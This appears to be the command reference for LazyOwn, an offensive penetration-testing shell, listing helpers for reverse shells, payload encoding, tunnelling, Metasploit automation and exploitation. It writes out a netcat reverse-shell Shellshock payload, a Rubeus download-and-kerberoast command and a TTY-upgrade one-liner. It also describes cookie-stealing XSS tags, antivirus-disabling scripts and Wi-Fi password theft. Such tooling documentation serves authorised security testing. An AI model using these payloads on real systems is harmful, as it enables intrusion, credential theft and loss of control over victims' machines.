Example: hashcat 0 # If wordlist is set to /usr/share/wordlists/rockyou.txt and line is 0, the command executed will be hashcat -a 0 -m 0 /usr/share/wordlists/rockyou.txt.

Note: - Ensure that the wordlist parameter is set before calling this function. - The hash to be cracked must be passed as an argument when calling the function. - Replace <mode> with the appropriate Hashcat mode number (e.g., 0 for MD5, 1000 for NTLM).

complete_hashcat

Complete mode options and file paths for the sessions/hash.txt

responder

Runs Responder on a specified network interface with elevated privileges.

This function executes the Responder tool with sudo on the network interface provided in the device parameter.

Usage: responder

:param line: This parameter is not used in the function but is included for consistency with other command methods. :type line: str :returns: None

Manual execution: 1. The command sudo responder -I <device> is executed, where <device> is the network interface specified by the user.

Dependencies: - The function relies on sudo to run Responder with root privileges. - Ensure that Responder is installed and available in the system’s PATH.

Example: responder # If device is assign to tun0, the command executed will be sudo responder -I tun0.

Note: - Ensure that the device parameter is set before calling this function. - Replace <device> with the appropriate network interface, such as tun0, eth0, etc. - Running Responder requires root privileges, so make sure the user running the command has the necessary permissions.

ip

Displays IP addresses of network interfaces and copies the IP address from the tun0 interface to the clipboard.

This function performs the following tasks: 1. Displays IP addresses for all network interfaces using ip a show scope global and awk. 2. Copies the IP address from the tun0 interface to the clipboard using xclip.

Usage: ip

:param line: This parameter is not used in the function but is included for consistency with other command methods. :type line: str :returns: None

Manual execution: 1. The command ip a show scope global | awk '/^[0-9]+:/ { sub(/:/,"",$2); iface=$2 } /^[[:space:]]*inet / { split($2, a, "/"); print " [" iface"] "a[1] }' is executed to display the IP addresses of all network interfaces. 2. The IP address of the tun0 interface is copied to the clipboard using the command ip a show tun0 | grep 'inet ' | awk '{print $2}' | cut -d'/' -f1 | xclip -sel clip.

Dependencies: - The function relies on awk, grep, cut, and xclip to process and copy the IP address.

Example: ip # This will display IP addresses for all network interfaces and copy the IP address from tun0 to the clipboard.

Note: Ensure that the tun0 interface exists and has an IP address assigned. If tun0 is not present or has no IP address, the clipboard will not be updated.

ipp

Displays IP addresses of network interfaces and prints the IP address from the tun0 interface.

This function performs the following tasks: 1. Displays IP addresses for all network interfaces using ip a show scope global and awk. 2. Prints the IP address from the tun0 interface.

Usage: ip

:param line: This parameter is not used in the function but is included for consistency with other command methods. :type line: str :returns: None

Manual execution: 1. The command ip a show scope global | awk '/^[0-9]+:/ { sub(/:/,"",$2); iface=$2 } /^[[:space:]]*inet / { split($2, a, "/"); print " [" iface"] "a[1] }' is executed to display the IP addresses of all network interfaces. 2. The IP address of the tun0 interface is printed to the console using the command ip a show tun0 | grep 'inet ' | awk '{print $2}' | cut -d'/' -f1.

Dependencies: - The function relies on awk, grep, cut, and xclip to process and display the IP address.

Example: ip # This will display IP addresses for all network interfaces and print the IP address from tun0.

Note: Ensure that the tun0 interface exists and has an IP address assigned. If tun0 is not present or has no IP address, the address will not be displayed.

rhost

Copies the remote host (rhost) to the clipboard and updates the command prompt.

This function performs two tasks: 1. It copies the rhost parameter to the clipboard if it is valid. 2. It updates the command prompt to include the rhost and the current working directory.

Usage: rhost [clean]

:param line: An optional argument that determines the behavior of the function: - If ‘clean’, it resets the command prompt to its default format. - If any other value, it updates the command prompt to include the rhost and current working directory. :type line: str :returns: None

Manual execution: 1. If line is ‘clean’: - The command prompt is reset to its default format. 2. If line is any other value: - The command prompt is updated to show the rhost and the current working directory. - The rhost is copied to the clipboard using xclip.

Dependencies: - The script uses xclip to copy the rhost to the clipboard.

Example: rhost # This will copy the current rhost to the clipboard and update the prompt.

rhost clean # This will reset the command prompt to its default format.

Note: Ensure that the rhost is valid by checking it with the check_rhost function before copying it to the clipboard.

rrhost

Updates the command prompt to include the remote host (rhost) and current working directory.

This function performs two tasks: 1. It updates the command prompt to include the rhost and the current working directory if line is not ‘clean’. 2. It resets the command prompt to its default format if line is ‘clean’.

Usage: rhost [clean]

:param line: An optional argument that determines the behavior of the function: - If ‘clean’, it resets the command prompt to its default format. - If any other value, it updates the command prompt to include the rhost and current working directory. :type line: str :returns: None

Manual execution: 1. If line is ‘clean’: - The command prompt is reset to its default format. 2. If line is any other value: - The command prompt is updated to show the rhost and the current working directory.

Example: rhost # This will update the command prompt to include the rhost and current working directory.

rhost clean # This will reset the command prompt to its default format.

Note: Ensure that the rhost is valid by checking it with the check_rhost function before updating the prompt.

Show the banner

py3ttyup

Copies a Python reverse shell command to the clipboard.

This function generates a Python command that uses the pty module to spawn a new shell and copies it to the clipboard. This is typically used for creating a TTY shell in a reverse shell situation.

Usage: py3ttyup

:param line: This parameter is not used in the function. :type line: str :returns: None

Manual execution: 1. The function creates a Python command with pty.spawn to open a shell. 2. The command is copied to the clipboard using xclip. 3. A message is printed to inform the user that the command has been copied.

Dependencies: - The script uses xclip to copy the command to the clipboard.

Example: py3ttyup # This will copy the Python command python3 -c 'import pty; pty.spawn("/bin/bash")' to the clipboard.

Note: This command is often used in scenarios where you need a more interactive shell from a reverse shell connection.

rev

Copies a reverse shell payload to the clipboard.

This function generates a reverse shell command that connects back to the specified host and port, and copies it to the clipboard. It also provides a way to execute the payload via a PHP-based web shell.

Usage: rev

:param line: This parameter is not used in the function. :type line: str :returns: None

Manual execution: 1. Ensure that lhost, lport, and rhost parameters are assign. 2. The function generates a reverse shell command in Bash and prints instructions for using the payload. 3. It also provides an example URL and PHP code snippet that decodes and executes the base64-encoded payload. 4. The reverse shell command is copied to the clipboard using xclip.

Dependencies: - The script uses xclip to copy the command to the clipboard. - Base64 encoding is used to obfuscate the payload.

Example: rev # This will copy a reverse shell command to the clipboard and display instructions for its use.

img2cookie

Copies a malicious image tag payload to the clipboard.

This function crafts and copies two different image tag payloads designed to steal cookies from a target’s browser. The payloads use JavaScript to send cookies to a specified host and port. The user is prompted to select which payload to copy to the clipboard.

Usage: img2cookie

:param line: This parameter is not used in the function. :type line: str :returns: None

Manual execution: 1. Ensure that lhost, lport, and rhost parameters are assign. 2. The function generates two payloads: - Payload 1: A script that sends cookies to the specified host and port. - Payload 2: An image tag with an onerror event that fetches cookies and sends them to the specified host and port using Base64 encoding. 3. The user is prompted to choose between the two payloads, which are then copied to the clipboard.

Dependencies: - The script uses xclip to copy the payloads to the clipboard. - Ensure that lhost, lport, and rhost parameters are assign with appropriate values.

Example: img2cookie # This will prompt you to select between two payloads. The chosen payload will be copied to the clipboard.

disableav

Creates a Visual Basic Script (VBS) to attempt to disable antivirus settings.

This function generates a VBS script designed to modify Windows Registry settings and run PowerShell commands to disable various Windows Defender antivirus features.

Usage: disableav

:param line: This parameter is not used in the function. :type line: str :returns: None

Manual execution: 1. The function writes a VBS script to a file named aav.vbs in the sessions directory. 2. The script: - Elevates its privileges if not already running as an administrator. - Modifies Windows Registry settings to disable various Windows Defender features. - Outputs PowerShell commands to disable additional Windows Defender settings.

The VBS script: - Uses WScript.Shell to modify the Windows Registry for disabling Windows Defender. - Calls PowerShell commands to further disable antivirus features.

Dependencies: - The script must be executed on a Windows system where you have administrative privileges. - Ensure you have appropriate permissions to modify Windows Registry settings.

Example: disableav # This will create the aav.vbs file with the specified content in the sessions directory.

conptyshell

Downloads ConPtyShell and prepares a PowerShell command for remote access.

This function downloads the ConPtyShell PowerShell script and ZIP archive to the sessions directory and copies a PowerShell command to the clipboard for easy execution.

Usage: conptyshell

:param line: This parameter is not used in the function. The required host and port are retrieved from the params dictionary. :type line: str :returns: None

Manual execution: 1. Ensure that the lhost and lport parameters are assign with the local host and port for the reverse shell. 2. The function downloads Invoke-ConPtyShell.ps1 and ConPtyShell.zip to the sessions directory. 3. Constructs a PowerShell command to run Invoke-ConPtyShell.ps1 with the specified local IP and port. 4. Copies the constructed command to the clipboard using xclip.

The constructed PowerShell command: - Uses Invoke-ConPtyShell.ps1 to establish a reverse shell connection to the specified lhost and lport. - Sets the PowerShell execution policy to bypass and specifies the dimensions of the terminal window.

Dependencies: - wget: For downloading files from the internet. - xclip: For copying commands to the clipboard. - Ensure ConPtyShell script and ZIP are compatible with your environment.

Example: conptyshell # This will download the required files and copy the PowerShell command to the clipboard.

pwncatcs

Runs pwncat-cs with the specified port for listening.

This function starts a pwncat-cs listener on the specified local port. It can use a port defined in the lport parameter or a port provided as an argument.

Usage: pwncatcs

:param line: The port number to use for the pwncat-cs listener. If not provided, it defaults to the lport parameter. :type line: str :returns: None

Manual execution: 1. Ensure that pwncat-cs is installed and accessible from your command line. 2. The port number can either be provided as an argument or be assign in the lport parameter of the function. 3. Run the function to start pwncat-cs on the specified port.

If no port is provided as an argument, the function will use the port specified in the lport parameter. If a port is provided, it overrides the lport value.

After starting the listener, the function prints a message indicating that pwncat-cs is running on the specified port and another message when the session is closed.

Dependencies: - pwncat-cs: A tool used for creating reverse shells or bind shells.

pwncat

Runs pwncat with the specified port for listening. SELFINJECT

This function starts a pwncat listener on the specified local port. It can use a port defined in the lport parameter or a port provided as an argument.

Usage: pwncatcs

:param line: The port number to use for the pwncat-cs listener. If not provided, it defaults to the lport parameter. :type line: str :returns: None

Manual execution: 1. Ensure that pwncat-cs is installed and accessible from your command line. 2. The port number can either be provided as an argument or be assign in the lport parameter of the function. 3. Run the function to start pwncat-cs on the specified port.

If no port is provided as an argument, the function will use the port specified in the lport parameter. If a port is provided, it overrides the lport value.

After starting the listener, the function prints a message indicating that pwncat-cs is running on the specified port and another message when the session is closed.

Dependencies: - pwncat-cs: A tool used for creating reverse shells or bind shells.

find

Automates command execution based on a list of aliases and commands.

  1. Displays available aliases and their commands.
  2. Asks the user if they want to execute a specific command.
  3. If confirmed, displays the alias and command with a number.
  4. Executes the command and copies it to the clipboard.

:param line: The command line input containing a keyword to filter the list of alias and command pairs. :type line: str :returns: None

Manual execution: - Prepare the list of alias and command pairs in the format: “alias command”. - Provide this list as input to the function. - Confirm the execution of the desired command when prompted. - Manually copy the command to the clipboard if needed.

Note: Ensure xclip is installed and properly configured to use clipboard functionalities.

sh

Executes a shell command directly from the LazyOwn interface.

This function allows the user to execute arbitrary shell commands without exiting the LazyOwn shell. It checks if a command is provided, prints a message indicating the command being executed, and then runs the command using os.system.

Usage: sh

:param line: The shell command to be executed. :type line: str :raises ValueError: If no command is provided, an error message is printed indicating that a command is required. :returns: None

Example: sh ls -la # This will execute ‘ls -la’ in the shell without exiting LazyOwn.

Note: Ensure that the command provided is safe to execute and does not include potentially harmful operations.

pwd

Displays the current working directory and lists files, and copies the current directory path to the clipboard.

This function performs the following tasks: 1. Displays the current working directory with pwd and lists files in the directory using ls. 2. Copies the current directory path to the clipboard using xclip.

Usage: pwd

:param line: This parameter is not used in the function but is included for consistency with other command methods. :type line: str :returns: None

Manual execution: 1. The command echo -e "[\e[96m\pwd`

winbase64payload

Creates a base64 encoded payload specifically for Windows to execute a PowerShell command or download a file using lhost.

  1. Checks if lhost is set:
    • Displays an error message and exits if lhost is not set.
  2. Checks if a file name or command is provided:
    • Displays an error message and exits if no file name or command is provided.
  3. Prompts for the type of payload:
    • ‘1’: Constructs a PowerShell command to download and execute a .ps1 script from lhost.
    • ‘2’: Constructs a command to download a file using wget.
  4. Prompts for the output type:
    • ‘1’: Outputs the base64 encoded PowerShell command.
    • ‘2’: Outputs the base64 encoded command in an ASP format.
    • ‘3’: Outputs the base64 encoded command in a PHP format.
  5. Encodes the command:
    • Converts the command to UTF-16LE encoding.
    • Encodes the UTF-16LE encoded command to base64.
    • Copies the final base64 command to the clipboard using copy2clip.

:param line: The name of the .ps1 file or the command to be executed. :type line: str :returns: None

Manual execution: To manually use the payload: - Ensure lhost is assign to the correct IP address. - Place the .ps1 file in the sessions directory if using the ‘ps1’ payload type. - Use copy2clip to copy the generated base64 command to the clipboard.

Note: Ensure iconv, base64, and xclip are installed and available on your system.

revwin

Creates a base64 encoded PowerShell reverse shell payload specifically for Windows to execute a .ps1 script from lhost.

  1. Checks if lhost and lport are assign and valid:
    • Uses check_lhost(lhost) to verify the lhost parameter.
    • Uses check_lport(lport) to verify the lport parameter.
    • Exits the function if either lhost or lport is invalid.
  2. Constructs a PowerShell reverse shell command with the following structure:
    • Connects to the specified lhost and lport using TCPClient.
    • Reads data from the TCP stream, executes it, and sends back the results.
    • Appends the current path to the response for interactive use.
  3. Encodes the PowerShell command:
    • Encodes the command in UTF-16LE.
    • Converts the UTF-16LE encoded command to base64.
    • Creates a PowerShell command that executes the base64 encoded payload.
  4. Copies the final PowerShell command to the clipboard:
    • Uses xclip to copy the command to the clipboard.

:param line: This parameter is not used in the function but is present for consistency with the method signature. :type line: str :returns: None

Manual execution: To manually use the payload: - Ensure lhost and lport are correctly set. - Use xclip to copy the generated PowerShell command to the clipboard.

Note: Ensure xclip is installed and available on your system.

asprevbase64

Creates a base64 encoded ASP reverse shell payload and copies it to the clipboard.

  1. Checks if a base64 encoded payload is provided:
    • If no payload is provided, displays an error message and exits the function.
  2. If a payload is provided:
    • Creates an ASP script that uses WScript.Shell to execute a PowerShell command encoded in base64.
    • The created ASP script writes the result of the PowerShell command to the response output.
    • Uses xclip to copy the ASP script to the clipboard with the provided base64 encoded payload.

:param line: The base64 encoded payload to be used in the ASP reverse shell. :type line: str :returns: None

Manual execution: To manually create the ASP payload: - Ensure you have the base64 encoded payload ready. - Use xclip to copy the provided command to the clipboard.

Note: Ensure xclip is installed and available on your system. For help on creating the base64 encoded payload, see help winbase64payload.

rubeus

Copies a command to the clipboard for downloading and running Rubeus.

  1. Checks if lhost (local host IP) is set:
    • If lhost is not set, displays an error message and exits the function.
  2. If lhost is set:
    • Displays a message indicating that the Rubeus downloader command has been copied to the clipboard.
    • The copied command downloads Rubeus from the specified lhost and saves it as Rubeus.exe.
    • Uses xclip to copy the following command to the clipboard:
    • iwr -uri http://{lhost}/Rubeus.exe -OutFile Rubeus.exe ; .\Rubeus.exe kerberoast /creduser:domain.local\usuario /credpassword:password

:param line: Not used in this function. :type line: str :returns: None

Manual execution: To manually run these tasks, you would need to: - Ensure that lhost is assign correctly. - Use xclip to copy the provided command to the clipboard. - Execute the downloaded Rubeus executable with the provided arguments.

Note: Ensure xclip is installed and available on your system.

socat

Sets up and runs a socat tunnel with SOCKS4A proxy support.

  1. If no line (IP:port) argument is provided:

    • Displays an error message indicating the need to pass ip:port.
    • Exits the function.
  2. Displays a message instructing the user to configure socks5 at 127.0.0.1:1080 in /etc/proxychains.conf.

  3. If a valid line argument is provided:

    • Displays the command being run: socat TCP-LISTEN:1080,fork SOCKS4A:localhost:{line},socksport=1080.
    • Executes the socat command to listen on port 1080 and forward traffic to the specified IP and port using SOCKS4A proxy.
    • Prints a shutdown message for the socat tunnel at port 1080.

:param line: The IP and port (formatted as ip:port) to forward traffic to through the SOCKS4A proxy. :type line: str :returns: None

Manual execution: To manually run these tasks, you would need to: - Configure the socks5 proxy settings in /etc/proxychains.conf. - Use the socat command with appropriate IP and port.

Note: Ensure that socat is installed and properly configured on your system.

chisel

Automates the setup and execution of Chisel server and client for tunneling and port forwarding.

  1. If no lhost (local host IP) is assign:
    • Displays an error message indicating the need to assign lhost using the set command.
    • Exits the function.
  2. If no port argument is provided:
    • Displays an error message indicating the need to provide a port number.
    • Exits the function.
  3. If required Chisel files are not present:
    • Displays an error message prompting the user to run the download_resources command.
    • Exits the function.
  4. If a valid port is provided:
    • Displays usage instructions for the Linux and Windows payloads.
    • Constructs and copies the appropriate Chisel command to the clipboard based on user choice (1 for Windows, 2 for Linux).
    • Extracts and sets up Chisel binaries for Linux and Windows from compressed files.
    • Runs the Chisel server on the specified port and prints a shutdown message.

:param line: The command line input containing the port number for Chisel setup. :type line: str :returns: None

Manual execution: To manually run these tasks, you would need to: - Ensure lhost is assign using assign lhost <IP>. - Provide the port number when calling the function. - Run the command download_resources if the Chisel files are missing. - Manually execute the Chisel commands for Linux or Windows as copied to the clipboard.

Note: Ensure that all required files (chisel_1.9.1_linux_amd64.gz and chisel_1.9.1_windows_amd64.gz) are available in the sessions directory.

msf

Automates various Metasploit tasks including scanning for vulnerabilities, setting up reverse shells, and creating payloads.

  1. If no arguments are provided:
    • Retrieves the target IP (rhost) from parameters.
    • Checks if the IP is valid using check_rhost(). If invalid, exits the function.
    • Creates a Metasploit resource script (/tmp/scan_vulnerabilities.rc) that includes commands for scanning ports, enumerating services, and checking for known vulnerabilities.
    • Executes Metasploit with the created resource script and then deletes the temporary file.
    • Prints a shutdown message after running the scan.
  2. If the argument starts with “rev”:
    • Sets up a reverse shell payload based on the specified platform and user choice (with or without meterpreter).
    • Creates a Metasploit resource script (/tmp/handler.rc) for handling incoming reverse shell connections.
    • Executes Metasploit with the created resource script and then deletes the temporary file.
    • Prints a shutdown message after setting up the handler.
  3. If the argument starts with “lnk”:
    • Configures parameters (lhost, lport) for creating a payload.
    • Uses msfvenom to generate a payload executable and saves it in the sessions directory.
    • Creates an XML file (download_payload.xml) that will be used to download and execute the payload on a target machine.
    • Creates a PowerShell script (create_lnk.ps1) to generate a shortcut file (.lnk) pointing to the payload.
    • Prints instructions and generates a command to copy to the clipboard for setting up the payload and files.
  4. If the argument starts with “autoroute”:
    • Configures parameters for setting up a Metasploit session and autorouting.
    • Creates a Metasploit resource script (/tmp/autoroute.rc) to handle exploit sessions and assign up autorouting.
    • Executes Metasploit with the resource script and starts a SOCKS proxy for routing traffic.
    • Configures proxychains to use the Metasploit SOCKS proxy and prints instructions for using proxychains with tools.

:param line: The command line input that determines which Metasploit task to automate. :type line: str :returns: None

Manual execution: To manually run these tasks, you would need to: - For scanning: Create and run the resource script using msfconsole -r /tmp/scan_vulnerabilities.rc. - For reverse shells: Configure and run the resource script with the appropriate payload settings. - For payload generation and shortcuts: Use msfvenom and create XML and PowerShell scripts as specified. - For autorouting: Create and run the resource script for autorouting and configure proxychains.

Note: Ensure all required parameters (lhost, lport, etc.) are assign before running these tasks.

encrypt

Encrypts a file using XOR encryption.

  1. Splits the provided line into file_path and key arguments.
  2. Checks if the correct number of arguments (2) is provided; if not, prints an error message and returns.
  3. Reads the file specified by file_path.
  4. Encrypts the file contents using the xor_encrypt_decrypt function with the provided key.
  5. Writes the encrypted data to a new file with the “.enc” extension added to the original file name.
  6. Prints a message indicating the file has been encrypted.
  7. Catches and handles the FileNotFoundError exception if the specified file does not exist, and prints an error message.

:param line: A string containing the file path and the key separated by a space. :type line: str :returns: None

Manual execution: To manually run this command, use the following syntax: encrypt Replace <file_path> with the path to the file to be encrypted and <key> with the encryption key.

decrypt

Decrypts a file using XOR encryption.

  1. Splits the provided line into file_path and key arguments.
  2. Checks if the correct number of arguments (2) is provided; if not, prints an error message and returns.
  3. Reads the encrypted file specified by file_path.
  4. Decrypts the file contents using the xor_encrypt_decrypt function with the provided key.
  5. Writes the decrypted data to a new file by removing the “.enc” extension from the original file name.
  6. Prints a message indicating the file has been decrypted.
  7. Catches and handles the FileNotFoundError exception if the specified file does not exist, and prints an error message.

:param line: A string containing the file path and the key separated by a space. :type line: str :returns: None

Manual execution: To manually run this command, use the following syntax: decrypt Replace <file_path> with the path to the encrypted file and <key> with the decryption key.

get_output

Devuelve la salida acumulada

sessionssh

Ejecuta un comando para listar las conexiones SSH activas.

Este método utiliza netstat para mostrar las conexiones establecidas (ESTAB) y filtra los resultados para mostrar solo las conexiones SSH.

Parámetros: - line: Parámetro no utilizado en esta función.

Returns: - None

Ejemplos: >>> do_sessionssh(““) (Muestra en consola las conexiones SSH activas)

sessionsshstrace

Attach strace to a running process and log output to a file.

This function attaches strace to a process specified by its PID, tracing system calls related to writing data. The output of strace is saved to a file named strace.txt in the sessions directory.

Parameters: - line (str): The PID of the process to attach strace to.

Raises: - ValueError: If the line parameter is empty. - FileNotFoundError: If strace is not installed.

Example: - sessionsshstrace 666: Attach strace to process with PID 666.

Notes: - Ensure the sessions directory exists or is created before running the command. - The command redirects both stdout and stderr to the strace.txt file.

lazyscript

Executes commands defined in a lazyscript file.

This function reads a script file containing commands to be executed sequentially. Each command is executed using the onecmd method of the cmd.Cmd class. The script file should be located in the ‘lazyscripts’ directory relative to the current working directory.

Args: line (str): The name of the script file to execute (e.g., ‘lazyscript.ls’).

Example: do_lazyscript(‘example_script.ls’) This would execute all commands listed in ‘lazyscripts/example_script.ls’.

set_proxychains

Relanza la aplicación actual utilizando proxychains para enrutar el tráfico a través de los proxies configurados.

Este comando reinicia la aplicación desde el principio utilizando un script bash externo llamado run, que se encarga de configurar el entorno (como activar un entorno virtual) y luego ejecutar la aplicación Python. El comando proxychains se utiliza para asegurar que cualquier comando ejecutado dentro de la aplicación, como nmap, sea encaminado a través de los proxies especificados en la configuración de proxychains.

Pasos realizados por esta función: 1. Obtiene la ruta al script run. 2. Relanza el script run bajo proxychains utilizando subprocess.run. 3. Sale de la instancia actual de la aplicación para evitar duplicación.

Args: line (str): No se utiliza en este comando, pero se incluye como parte de la interfaz estándar de cmd.

shellcode

Generates a Python one-liner to execute shellcode from a given URL.

This function: 1. Retrieves the local host (lhost) from the parameters. 2. Checks if the local host is valid. 3. Verifies the existence of the shellcode.bin file in the expected directory. 4. Constructs a Python one-liner command that: - Fetches the shellcode from the specified URL. - Decodes the base64-encoded shellcode. - Creates a buffer in memory for the shellcode. - Casts the buffer to a function pointer. - Executes the shellcode. 5. Copies the generated command to the clipboard for easy execution.

skipfish

This function executes the web security scanning tool Skipfish using the provided configuration and parameters. It allows scanning a specified target (rhost) and saves the results in a designated output directory.

Parameters: - self: Refers to the instance of the class in which this function is defined. - line: A string that may contain additional options to modify the scanning behavior.

Function Flow: 1. Default values are set for the target IP (rhost), port (port), and output directory (outputdir). 2. The validity of the target (rhost) is checked using the check_rhost function. 3. If no argument is provided in line, a skipfish command is constructed using the default values. 4. If line starts with ‘url’, the URL configured in self.params['url'] is retrieved and used to construct the skipfish command. 5. If the URL is not configured and an attempt is made to use the ‘url’ option, an error message is printed, and the function exits. 6. The constructed skipfish command is displayed on the console and executed using os.system.

Note: - The function assumes that the skipfish tool is installed on the system. - The output of the scan is saved in the directory sessions/{rhost}/skipfish/. - The wordlist used by Skipfish is specified in wordlist.

createdll

Create a Windows DLL file using MinGW-w64 or a Blazor DLL for Linux.

This function prompts the user to select between creating a 32-bit DLL, a 64-bit DLL, or a Linux Blazor DLL. It first checks if MinGW-w64 is installed; if not, it attempts to install it. The user must provide a filename for the DLL, which will be created from the sessions/rev.c source file. The function constructs the appropriate command to compile the DLL based on the user’s choice and executes it. If the user selects a 32-bit or 64-bit compilation, the function also opens the rev.c file in a text editor for modifications before compilation. For option 3, it executes a script to create a Blazor DLL using the local host (lhost) address to download the necessary payload.

Parameters: - line (str): The name of the DLL file to be created. Must be provided by the user.

Usage: - Choose “1” for 32-bit, “2” for 64-bit, or “3” for creating a Linux Blazor DLL. - Ensure that shellcode is created beforehand using the lazymsfvenom or venom options 13 or 14 to replace in sessions/rev.c.

seo

Performs a web seo fingerprinting scan using lazyseo.py.

  1. Executes the lazyseo.py command to identify h1,h2,links,etc used by the target web application.

:param line: This parameter is not used in the current implementation but could be used to pass additional options or arguments if needed. :param rhost: The target web host to be scanned, specified in the params dictionary.

:returns: None

Manual execution: To manually perform web seo fingerprinting, use the following command: lazyseo.py

Replace <target_host> with the URL or IP address of the web application you want to scan.

For example: lazyseo.py example.com

padbuster

Execute the PadBuster command for padding oracle attacks.

This function constructs and executes a PadBuster command to perform a padding oracle attack on the specified URL. It requires the user to provide a URL, a cookie with a hash, a plaintext value to compare, and a specific byte position to attack.

Parameters: - line (str): The input line containing the cookie, plaintext, and byte position. Expected format: ‘cookie= plaintext ’.

Functionality: - The function first checks if a URL is assign in the parameters. - It then validates that the correct number of arguments is provided. - If the arguments are valid, it constructs the PadBuster command and executes it. - The command is also copied to the clipboard for convenience.

Usage Example: - assign url http://target.com - padbuster auth= user=admin 8

smbattack

Scans for hosts with SMB service open on port 445 in the specified target network.

This function performs the following actions: 1. Scans the specified subnet for hosts with an open SMB port (445). 2. Sets up a Metasploit handler to listen for reverse connections. 3. Attempts to exploit the Conficker vulnerability on each identified host. 4. Optionally conducts a brute-force attack on SMB using the provided password file.

Parameters: line (str): The command line input for the smbattack function, though not used directly in this implementation.

Returns: None

cacti_exploit

Automates the exploitation of the Cacti version 1.2.26 vulnerability using the multi/http/cacti_package_import_rce exploit.

This function performs the following actions: 1. Sets up a Metasploit handler to listen for reverse connections. 2. Attempts to log in to the Cacti instance with provided credentials. 3. Checks if the target is vulnerable and uploads the malicious payload. 4. Triggers the payload to obtain a Meterpreter session.

Parameters: line (str): The command line input for the cacti exploit function, though used directly in this implementation to set password.

Returns: None

smalldic

Handles the creation of temporary files for users and passwords based on a small dictionary.

This function prompts the user to decide whether to use a small dictionary for generating user and password lists. If the user agrees, it loads the credentials from a JSON file and writes them into temporary files. If the user declines, the process is aborted.

Parameters: list (str): Not used in this function, but kept for compatibility with cmd command input.

Returns: None

ngrok

Set up and run ngrok on a specified local port. If ngrok is not installed, it will automatically be installed. The user will be prompted to provide their ngrok authentication token to complete the setup.

Args: line (str): The input line, though it’s not directly used in this function.

Workflow: 1. Check if the local port specified in self.params["lport"] is valid. 2. Verify if ngrok is installed. If not, proceed with installation. 3. After installation, prompt the user to authenticate ngrok using their token. 4. Once authenticated, run ngrok to expose the specified local port.

Note: The ngrok authentication token can be obtained from the ngrok dashboard.

wifipass

This function generates a PowerShell script that retrieves saved Wi-Fi passwords on a Windows system. The script gathers the Wi-Fi profiles, extracts their passwords, and saves the information in a text file named ‘wifi_passwords.txt’ in the directory where the script is executed. The generated PowerShell command is copied to the clipboard for easy execution.

Parameters: line (str): This parameter is not used within the function but is required for the command interface.

The function does not return any value.

shellshock

Executes a Shellshock attack against a target.

This function constructs and sends a specially crafted HTTP request designed to exploit the Shellshock vulnerability on a target server. The payload is embedded in the ‘User-Agent’ header, and when executed, it will open a reverse shell connection to the attacker’s machine.

Parameters: - lport: Local port for the reverse shell connection, retrieved from self.params. - lhost: Local host for the reverse shell connection, retrieved from self.params.

The function first validates the local host (lhost) and local port (lport) using check_lhost() and check_lport(). If either validation fails, the function returns without proceeding.

If the validation passes, the payload is created using the format: ‘() { :; }; /bin/bash -c “nc -v {rhost} {lport} -e /bin/bash -i”’, where rhost is the remote target’s IP address and lport is the specified local port.

The function then attempts to send a GET request to the target URL (args.target) with the crafted payload in the ‘User-Agent’ header. The server’s response is captured and printed using print_msg().

If any error occurs during the request, an error message is displayed using print_error().

Returns: None

powerserver

This function generates a PowerShell script that retrieves reverse shell over http on a Windows system. The script generated PowerShell reverse shell to execute command by curl command is copied to the clipboard for easy execution.

Parameters: line (str): This parameter is used to get the port to create the listener

The function does not return any value. Example of use: curl -X POST http://victim:8080/ -d “Get-Process”

morse

Interactive Morse Code Converter.

This function serves as an interface for converting text to Morse code and vice versa. It provides a menu with the following options:

1️⃣ Convert text to Morse code. 2️⃣ Convert Morse code to text. 0️⃣ Exit the program.

When the function is called, it runs an external script (morse.py) that handles the conversion processes. The function also manages keyboard interruptions gracefully, allowing the user to exit the program cleanly.

Arguments: line (str): This argument is reserved for future enhancements but is currently not used.

Returns: None

Notes: - Ensure that the morse.py module is located in the modules directory and is executable. - The function captures KeyboardInterrupt to allow safe exit from the Morse code converter.

Example: >>> do_morse(““)

See Also: - morse.py: The script that contains the logic for Morse code conversions.

waybackmachine

Fetch URLs from the Wayback Machine for a given website. The URL is taken from line. If the URL is not provided, an error is printed. The limit of results is taken from self.params[“limit”] if provided; otherwise, defaults to 10. Results are printed directly to the console.

c2

Handles the execution of a C2 (Command and Control) server setup command.

This function performs the following tasks: 1. Retrieves and validates the local host (lhost) and local port (lport) parameters. 2. Checks if the required file modules/run exists. 3. Reads the content of the modules/run file, replaces placeholders with actual values (lport, line, lhost), and copies the updated content to the clipboard. 4. Prompts the user to start the C2 server, and if confirmed, executes the server command. 5. Provides a warning about shutting down the server.

Args: line (str): The victim ID or command line to be used by the C2 server.

Returns: None

Raises: None

Example: c2 victim 1

Notes: - Ensure that the lhost and lport parameters are valid before calling this function. - The modules/run file must exist and be correctly formatted. - The server command is executed using os.system, which may require additional handling for security.

kick

Handles the process of sending a spoofed ARP packet to a specified IP address with a given MAC address.

This function performs the following steps: 1. Executes a command to list current ARP entries and prints the IP and MAC addresses. 2. Prompts the user to input the target IP and MAC address in a specified format. 3. Parses the provided input to extract the IP and MAC addresses. 4. Sets up default values for the gateway IP, local MAC address, and network interface. 5. Creates an ARP packet with the specified target IP and MAC address. 6. Sends the ARP packet using the specified network interface. 7. Prints a confirmation message indicating that the spoofing packet has been sent.

Args: line (str): Input line for the command, which is not used directly in this function.

Raises: Exception: If any error occurs during the execution of the function.

sqli

Asks the user for the URL, database, table, and columns, and then executes the Python script ‘modules/lazybsqli.py’ with the provided parameters.

Parameters: - def_func: Function to execute (not used in this example). - line: Command line or additional input (not used in this example).

Example: - do_bsqli(None, None)

sshkey

Generates an SSH key pair with RSA 4096-bit encryption. If no name is provided, it uses ‘lazyown’ by default. The keys are stored in the ‘sessions/’ directory.

Parameters: - line: The name of the key file. If empty, ‘lazyown’ is used as the default.

Example: - do_sshkey(None) # Generates ‘lazyown’ key - do_sshkey(“custom_key”) # Generates ‘custom_key’ key

crunch

Generate a custom dictionary using the crunch tool.

This function creates a wordlist with a specified length using the crunch command. It allows the user to specify a custom character pattern for the wordlist.

:param line: The length of the strings to be generated (e.g., ‘6’ for 6-character strings). If not provided, the function will prompt an error message.

:returns: None

Example usage: >>> crunch 6 This will generate a wordlist with all possible combinations of 6-character strings using the default pattern.

Additional notes: - If no custom pattern is provided, the function uses a default pattern: “0123456789abcdefghijklmnñopqrstuvxyz,.-#$%@” - The output is saved in the sessions/ directory with the filename format dict_<length>.txt

malwarebazar

Fetches and displays malware information from the MalwareBazaar API based on the given tag.

Args: line (str): The tag used to query the MalwareBazaar API.

